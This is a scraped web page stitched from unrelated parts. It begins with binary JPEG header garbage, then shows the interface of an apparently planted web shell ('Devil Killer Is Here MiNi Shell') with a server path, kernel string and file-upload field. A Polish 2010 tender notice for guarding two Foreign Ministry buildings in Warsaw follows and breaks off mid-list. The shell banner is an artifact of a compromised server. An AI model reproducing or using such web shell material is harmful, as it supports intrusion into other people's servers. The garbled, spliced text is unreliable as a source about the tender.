JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100507/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100507/114117-N-2010.html

<p class="kh_header"><b>Warszawa: Kompleksowa ochrona obiektów krajowych MSZ.</b><br>
<b>Numer ogłoszenia: 114117 - 2010; data zamieszczenia: 07.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych , Al. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 5239962, faks 022 6283363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa ochrona obiektów krajowych MSZ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 1. Przedmiot zamówienia obejmuje: dozór i ochronę wskazanych w pkt. 1 lit. a) i b)  obiektów MSZ wraz z terenem do nich przyległym na terenie m. st. Warszawy, mieniem się w nich znajdującym oraz osobami tam przebywającymi. Usługa ochrony musi być wykonywana przez licencjonowanych pracowników ochrony osób i mienia wraz z monitorowaniem lokalnych elektronicznych systemów antywłamaniowych i antynapadowych, wykonaniem interwencji przez grupę interwencyjną na wezwanie pracownika ochrony pełniącego aktualnie służbę w nw. obiektach krajowych MSZ:		
a)	obiekt nr 1- ul. Bagatela 14, posterunek jednoosobowy całodobowy, w godzinach od 7.00 do 19.00 oraz od 19.00 do 7.00;
b)	obiekt nr 2 - ul. Krucza 38-42 Centrum Informacji Europejskiej, posterunek dwuosobowy, w dni robocze  od poniedziałku do piątku w godzinach od 8.00 do 18.00 oraz w soboty w godzinach od 10.00 do 16.00;
oraz 
patrol interwencyjny całodobowy - na wezwanie - we wszystkie dni kalendarzowe w roku (dni robocze, soboty, niedziele, święta i inne dni wolne od pracy). Czas reakcji  na wezwanie nie może być dłuższy niż 15 min. 

1.2. Zakres działania i odpowiedzialność Wykonawcy: 
a)	całodobowa ochrona fizyczna obiektu Nr 1 oraz ochrona fizyczna obiektu nr 2 w godzinach pracy Centrum Informacji Europejskiej wraz z mieniem w nich się znajdującym oraz osobami tam przebywającymi - zgodnie z pkt. 1.1 ppkt. a) i b);
b)	monitorowanie pracy technicznych środków wspomagających ochronę obiektu, informowanie Kierownika Sekcji Ochrony ZO MSZ o ich niesprawności;
c)	zapewnienie natychmiastowej  reakcji zmotoryzowanych grup interwencyjnych na wezwanie pracownika ochrony pełniącego aktualnie służbę na terenie obiektu;  czas reakcji nie może być dłuższy niż 15 min.;  
d)	przekazywanie Policji osób ujętych podczas wykonywania zadań ochronnych, zgodnie z odrębnymi przepisami;
e)	współpraca z Policją na zasadach określonych w odrębnych przepisach;
f)	przyjmowanie i przekazywanie meldunków w systemie dyżurnych służb operacyjnych MSZ oraz powiadamianie wskazanych osób funkcyjnych MSZ  i  ZO MSZ o zdarzeniach;
g)	współpraca z wewnętrzną służbą dyżurną MSZ DOOK oraz BOR;
h)	wykonywanie innych zadań określonych w Instrukcji Bezpieczeństwa Obiektu, zwanej dalej Instrukcją Ochrony przekazanej Wykonawcy po podpisaniu umowy, a zawierającej m.in. :
-    zadania w zakresie przestrzegania regulaminowego toku pracy na obiekcie,
-  opracowanie zakresów obowiązków pracowników ochrony Wykonawcy w toku pełnienia  dyżurów oraz uzyskanie zgody na powyższe Zamawiającego; 
- opracowanie zasad postępowania pracowników ochrony Wykonawcy w sytuacjach odbiegających od norm - kryzysowych oraz uzyskanie zgody na powyższe Zamawiającego;
-  zapewnienie przestrzegania w rejonie ochrony przepisów ppoż. i bhp przez wszystkich pracowników Wykonawcy w toku pełnienia dyżurów;
i)	Wykonawca w terminie 21 dni od dnia otrzymania Instrukcji opracuje Plany  Ochrony poszczególnych obiektów, uwzględniając zasady i warunki wykonywania zadań ochrony, wynikające z Instrukcji Ochrony oraz innych zaleceń Zamawiającego.

1.3. Przedmiot działania pracowników ochrony Wykonawcy: 
a) całodobowa ochrona fizyczna obiektu Nr 1 oraz obiektu Nr 2 w godzinach urzędowania Centrum Informacji Europejskiej, zgodnie z pkt. 1.1 ppkt. a) i b) w zakresie zapobiegania: 
- przestępstwom przeciwko życiu i zdrowiu (określonych w Rozdziale XIX K.K.),
- przestępstwom przeciwko bezpieczeństwu powszechnemu (określonych w rozdziale XX K.K.),
- przestępstwom przeciwko środowisku (określonych w Rozdziale XXII K.K.),
- przestępstwom przeciwko działalności instytucji państwowych oraz samorządu terytorialnego (określonych w Rozdziale XXIX K.K.),
- przestępstwom przeciwko porządkowi publicznemu (określonych w Rozdziale XXXII K.K.),
- przestępstwom przeciwko ochronie informacji (określonych w Rozdziale XXXIII K.K.),
- przestępstwom przeciwko mieniu (określonym w Rozdziale XXXV K.K.);
b) prowadzenie ciągłej obserwacji w ochranianych obiektach;
c) natychmiastowe  reagowanie na każdy sygnał o naruszeniu systemu ochrony obiektu oraz ścisłe wykonywanie zadań ochronnych szczegółowo określonych w Instrukcji ochrony, bez względu na porę doby i warunki atmosferyczne;
d) kontrolowanie i egzekwowanie przestrzegania przez osoby przebywające na terenie ochranianego obiektu ustalonych norm zachowania oraz zasad porządku publicznego;
e)	ujmowanie sprawców przestępstw określonych w pkt. 1.2. lit. a) dokonanych na terenie ochranianego obiektu w celu niezwłocznego przekazania tych osób Policji, Straży Miejskiej według odrębnych przepisów;
f)	prowadzenie kontroli ruchu osób wchodzących i wychodzących
z ochranianych obiektów;
g)	prowadzenie na bieżąco ewidencji interesantów i gości przybywających do komórek organizacyjnych MSZ i ZOMSZ mieszczących się w ochranianych obiektów;
h)	kierowanie interesantów i gości do uprawnionych osób funkcyjnych z komórek organizacyjnych MSZ mieszczących się w ochranianych obiektów;
i)	 prowadzenie na bieżąco dokumentacji służby dyżurnej określonej w Instrukcji ochrony;
j)	przeciwdziałanie wszelkim zagrożeniom wynikającym z nieprzestrzegania zasad porządkowych określonych w Instrukcji ochrony i innych integralnych z nią dokumentów;
k)	przyjmowanie i przekazywanie meldunków w systemie dyżurnych służb MSZ oraz powiadamianie wyznaczonych osób funkcyjnych;
l)	alarmowanie i powiadamianie pracowników służb dyżurnych MSZ oraz przekazywanie sygnałów ostrzegania zgodnie z Instrukcją ochrony;
m)	prowadzenie na bieżąco ewidencji, przyjmowanie na przechowanie oraz wydawanie osobom upoważnionym przez osoby wymienione w Instrukcji ochrony kluczy użytku bieżącego oraz kontrola zamknięcia pomieszczeń służbowych w obiekcie nr 1;
n)	egzekwowanie zasad przestrzegania porządku publicznego przez wszystkie osoby znajdujące się na terenie ochranianego obiektu;
o)	reagowanie w przypadku niepodporządkowania się poleceniom osób wobec których podejmowana jest interwencja, wymuszanie posłuszeństwa wszelkimi środkami z użyciem  środków przymusu bezpośredniego z zachowaniem zasad określonych w Rozporządzeniu Rady Ministrów z dnia 18 listopada 1998 r. w sprawie szczegółowego trybu działań ochrony, podejmowanych wobec osób znajdujących się w granicach chronionych obiektów i obszarów;
p)	współdziałanie w wykonywaniu zadań ochronnych z Policja, Strażą Miejską oraz jednostkami ochrony ppoż., zgodnie z Instrukcją ochrony;
q)	powiadamianie telefoniczne w przypadku wystąpienia awarii sieci energetycznej, telefonicznej i wodociągowej : Pogotowie wodociągowe, Pogotowie energetyczne, komenda ochrony, wyznaczonych pracowników oraz podejmowanie działań mających na celu zapobieganie skutkom awarii, zgodnie z instrukcją ochrony obiektu;
r)	prowadzenie kontroli - obchodów - po godzinach urzędowania - zamknięcia obiektu, zgodnie z instrukcją ochrony obiektu w obiekcie nr 1;
s)	sporządzanie pisemnych meldunków z przebiegu dyżuru w stosownej dokumentacji.

1.4. Sposób realizacji przedmiotu zamówienia:
a)	ochrona fizyczna obiektu nr 1 realizowana będzie w systemie całodobowej i ciągłej ochrony w godzinach od 07.00 do 07.00 dnia następnego, tj. 24 godziny system ochronny przez jednego pracownika ochrony na zmianie, w systemie dwuzmianowym - tj. od 7.00 do 19.00 oraz od 19.00 do 7.00 we wszystkie dni kalendarzowe roku (dni robocze, soboty, niedziele, święta, dni wolne od pracy );
b)	ochrona fizyczna obiektu nr 2 realizowana będzie przez dwóch pracowników ochrony w godzinach otwarcia Centrum Informacji Europejskiej tj. w dni robocze  od poniedziałku do piątku w godzinach od 8.00 do 18.00 oraz w soboty w godzinach od 10.00 do 16.00;
c)	patrol interwencyjny całodobowy, na wezwanie - we wszystkie dni kalendarzowe w roku 
(dni robocze, soboty, niedziele, święta i inne dni wolne od pracy), czas reakcji na wezwanie nie może być dłuższy niż 15 min.;

1.5. Wymagania wobec pracowników ochrony Wykonawcy: 
a)	wszyscy pracownicy ochrony realizujący usługę muszą być pracownikami wykonującymi zadania ochrony wyłącznie w obiektach określonych przez Zamawiającego;
b)	wprowadzenie nowego pracownika ochrony do obiektu następuje wyłącznie po wcześniejszym (co najmniej 48 godz. wyprzedzeniem) zawiadomieniem Zamawiającego;
c)	wszyscy pracownicy ochrony muszą odbyć szkolenie dotyczące zasad ochrony informacji niejawnych i posiadać zaświadczenia o jego ukończeniu. Przeprowadzenie takiego szkolenia leży w gestii Wykonawcy;
d)	wszyscy pracownicy ochrony realizujący usługę muszą być pracownikami ochrony fizycznej i posiadać licencję co najmniej I stopnia;



e)	wszyscy pracownicy ochrony realizujący usługę muszą posiadać poświadczenie o klauzuli co najmniej zastrzeżone, zgodnie z art. 27 i art. 67 ust. 2 pkt. 1,2 i 3 Ustawy o ochronie informacji niejawnych z dnia 22.01.1999 r. wystawione dla osób wyznaczonych do wykonywania przedmiotu zamówienia oraz osób nadzorujących wykonanie przedmiotu zamówienia ze strony Wykonawcy.

1.6. Zadania pracowników ochrony podczas pełnienia służby ochronnej: 
Szczegółowe zadania pracowników ochrony i sposób ich realizacji został określony w Instrukcji ochrony, która zostanie przekazana Wykonawcy po podpisaniu umowy.

1.7. Uprawnienia osób funkcyjnych MSZ i ZOMSZ w stosunku do pracowników ochrony oraz zakres i sposób prowadzenia przez przełożonych i osoby upoważnione do kontroli wykonywanych zadań ochronnych :
a)	do prowadzenia kontroli realizacji zadań ochrony obiektu, mienia MSZ mieszczącego się w ochranianym obiekcie oraz osób tam przebywających, ze strony Zamawiającego upoważnione są następujące osoby: 
- Dyrektor Zarządu Obsługi MSZ,
- Z-ca Dyrektora Zarządu Obsługi MSZ,
- Kierownik Działu Ochrony Obiektów Krajowych MSZ, bezpośrednio i  w pełni odpowiedzialny za realizację postanowień umowy usługi - ze strony Zamawiającego,
- inne osoby na podstawie pisemnego upoważnienia Dyrektora ZO MSZ;
b) wyżej wymienione osoby mają prawo do :
- prowadzenia bieżącej kontroli realizacji zadań ochronnych przez pracowników ochrony o każdej porze dnia i nocy;
- dokonywania zmian w Instrukcji ochrony stosownie do sytuacji i wynikających z niej zagrożeń, nie zmieniających innych postanowień podpisanej umowy,
- wnioskowanie do wykonawcy o zmianę pracownika ochrony w przypadku, gdy istnieje podejrzenie o nie dochowanie w tajemnicy informacji, z którymi zapoznał się w czasie wykonywania zadań ochronnych, lub sposób wykonania przez niego  zadań ochronnych budzi zastrzeżenia,
- wydawania poleceń pracownikom ochrony związanych z postępowaniem wobec osób postronnym ujętych na terenie chronionym,
- kontrolowania stanu zabezpieczenia ochranianego obiektu wraz z przyległym terenem chronionym,
- uzgadniania z przedstawicielem Wykonawcy sposobu i wariantów stosowanych w pełnieniu służby ochronnej,
- żądania od pracowników ochrony Wykonawcy doraźnych meldunków o sytuacji na ochranianym obiekcie,
- zwracania uwagi kontrolowanym pracownikom ochrony na stwierdzone niedociągnięcia w czasie pełnionej służby,
- żądania od kontrolowanych pracowników ochrony Wykonawcy usunięcia stwierdzonych niedociągnięć i nieprawidłowości,
- kontrolowania zapisów danych z elektronicznego systemu kontroli CCTV (monitoringu zewnętrznego i wewnętrznego obiektu).


1.8. Wyposażenie oraz umundurowanie pracowników ochrony stanowi :
a)	środki łączności bezprzewodowej,
b)	latarka,
c)	opatrunek osobisty,
d)	środki przymusu bezpośredniego określone przez Wykonawcę,
e)	w nadajnik monitorujący system sygnalizacji włamania i napadu oraz
bezprzewodowe przyciski napadowe wyposaża Wykonawca,
f)	umundurowanie o jednolitym wzorze dla wszystkich pracowników ochrony, 
g)	oznaczone w widocznym miejscu emblematem według wzoru Wykonawcy,
h)	identyfikator ze zdjęciem.

1.9. Skutki nie wykonania obowiązków ochrony: 
Niewykonanie, nienależyte wykonanie lub zaniechanie wykonania obowiązków ochrony, będzie skutkowało pociągnięciem do odpowiedzialności cywilnej, karnej lub finansowej Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.30.00-5, 79.71.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie: 5 000,00 zł (słownie:  pięć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenia zamówienia moga ubiegać sie wykonawcy, którzy posiadają koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji  w zakresie usług ochrony osób i mienia na podstawie ustawy z dnia 22 sierpnia 1997roku o ochronie osób i mienia (Dz.U. z 1997r. Nr 114, poz. 740).	 Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. SIWZ, przy użyciu formuły SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenia zamówienia moga ubiegać sie wykonawcy, którzy wykażą się odpowiednim doświadczeniem w zakresie niezbędnym do wykazania spełnienia powyższego warunku, tj.: w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują co najmniej 2 usługi w zakresie ochrony  osób i mienia w budynkach użyteczności publicznej przez które należy rozumieć: budynki przeznaczone na potrzeby oświaty, sportu, administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, obsługi pasażerów w transporcie kolejowym, oraz inne ogólnodostępne budynki przeznaczone do wykonywania podobnych funkcji w tym także budynki biurowe i socjalne o wartości co najmniej 100 000 zł. brutto każda.Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. SIWZ, przy użyciu formuły SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający sie o udzielenie zamówienia musi dysponować osobami zdolnymi do wykonania zamówienia, tj.  co najmniej 4 osobami posiadającymi udokumentowane kwalifikacje zawodowe do wykonywania ochrony fizycznej, które muszą posiadać:
- licencję co najmniej pierwszego stopnia, w oparciu o ustawę z dnia 22 sierpnia 1997r. o ochronie  osób i mienia (Dz.U. z 1997r. Nr 114, poz. 740);
- zaświadczenia o odbyciu szkolenia z ochrony informacji niejawnych oraz poświadczenia bezpieczeństwa w zakresie ochrony informacji niejawnych o klauzuli co najmniej zastrzeżone , zgodnie z art. 23 ust. 2 pkt. 2 i art. 27 ust. 1 Ustawy o ochronie informacji niejawnych z dnia 22.01.1999 r.
(Dz. U. z 1999r., Nr 11, poz. 95 z późniejszymi zmianami) wystawione dla osób wyznaczonych do wykonywania przedmiotu zamówienia oraz osób nadzorujących wykonanie przedmiotu zamówienia ze strony Wykonawcy.
Jeżeli Wykonawca będzie wykonywał zamówienie przy udziale większej liczby osób, wszystkie te osoby będą musiały posiadać kwalifikacje zawodowe, o których mowa powyżej.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. SIWZ, przy użyciu formuły SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający sie o udzielenie zamówienia musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w kwocie nie mniejszej niż 100 000, 00 zł.Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. SIWZ, przy użyciu formuły SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
